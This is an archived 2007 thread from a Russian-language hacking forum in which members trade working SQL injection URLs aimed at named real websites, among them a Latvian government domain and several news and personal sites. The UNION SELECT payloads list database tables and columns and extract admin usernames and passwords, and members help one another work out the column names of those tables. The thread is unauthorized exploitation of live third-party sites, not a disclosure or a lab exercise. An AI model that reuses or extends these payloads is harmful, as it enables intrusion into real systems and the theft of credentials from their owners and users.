HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.03.2007, 05:46
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

мож кто разбирается в PostgreSQL:
Код:
http://www.nne.ru/news.php?id=1658'
Довольно странная там шифровка паролей:
Код:
http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,TABLE_NAME,5,6+from+information_schema.tables+limit+16,1/*
http://www.davinciinstitute.com/page.php?ID='+union+select+1,2,3,concat(Username,0x3A,Password),5,6+from+Admin+limit+3,1/*
пара слепых вроде:
Код:
http://www.fm.gov.lv/page.php?id=-1+union+select+1111111111111111/*
http://daily.com.ua/analytics/page.php?id=32346+union+select+1,2/*

Последний раз редактировалось VampiRUS; 10.03.2007 в 06:33..
 
Ответить с цитированием

  #2  
Старый 10.03.2007, 10:32
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.ricardocabello.com/index.php?postid=-1+union+select+1,2,3,4,5,6,7,8/*
Код:
http://pnnonline.org/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
если кто-то додумает названия таблиц, буду благодарен) у меня фантазии не хватает уже =\
 
Ответить с цитированием

  #3  
Старый 10.03.2007, 12:53
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

в mysql.user доступа нет
Код:
http://www.rickardliljeberg.com/blog.php?itemID=1+and+1=-1+union+select+1,2,3,4,5,user(),7,8/*
 
Ответить с цитированием

  #4  
Старый 10.03.2007, 13:19
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

2 Colkru
http://forum.antichat.ru/threadnav21336-85-10.html
пост номер 847 =)
upd//
Код:
http://www.iconla.com/gallery.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17+from+INFORMATION_SCHEMA.TABLES+limit+21,1/*
ничего интересного =\

Последний раз редактировалось Spyder; 10.03.2007 в 13:30..
 
Ответить с цитированием

  #5  
Старый 10.03.2007, 13:39
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
2 Colkru
http://forum.antichat.ru/threadnav21336-85-10.html
пост номер 847 =)

Сорри, тогда вот 5-ая версия:

PHP код:
http://www.sju.ca/people2.php?id=-1+union+select+1,2,table_name,version(),null,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+0,1/* 
 
Ответить с цитированием

  #6  
Старый 10.03.2007, 13:40
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.ittraining.ro/cursuri.php?id=-3+union+select+1,id,3+from+admin
не смог колонки подобрать 0_о
 
Ответить с цитированием

  #7  
Старый 10.03.2007, 13:44
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
не смог колонки подобрать 0_о
колонка юзера - uname
пасс не подобрал
 
Ответить с цитированием

  #8  
Старый 10.03.2007, 13:55
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.migaweb.de/downloads.php?id=-10+union+select+1,2,3,4,5,6,tAbLe_nAmE,8,9,10+FrOm +InFoRmAtIoN_ScHeMa.tAbLeS+LiMiT+28,2
таблицы :
admin
admin_user
admin_user2
admin_user_allow
admin_intra
admin_intra_acc

Чё то у меня сегодня проблемы с колонками 0о
 
Ответить с цитированием

  #9  
Старый 10.03.2007, 17:20
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Spyder  
Код:
http://www.migaweb.de/downloads.php?id=-10+union+select+1,2,3,4,5,6,tAbLe_nAmE,8,9,10+FrOm +InFoRmAtIoN_ScHeMa.tAbLeS+LiMiT+28,2
таблицы :
admin
admin_user
admin_user2
admin_user_allow
admin_intra
admin_intra_acc

Чё то у меня сегодня проблемы с колонками 0о
Цитата:
Сообщение от Spyder  
а если не умеешь - читай статьи
хакеры млин
2Spyder
я бы посоветовал тебе почитать статьи
вот тебе все колонки
Код:
http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS/*
если имелось ввиду те таблицы что ты написал то вот пример одной из них
Код:
http://www.migaweb.de/downloads.php?id=-10+union+select+null,null,null,null,null,null,null,COLUMN_NAME,null,null+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(97,100,109,105,110)/*

Последний раз редактировалось }{0TT@БЬ)Ч; 10.03.2007 в 17:32..
 
Ответить с цитированием

  #10  
Старый 10.03.2007, 15:58
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

PHP код:
http://www.uprava.org/section.php?id=34'
http://www.shamray.ru/show.php?id=31' 
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ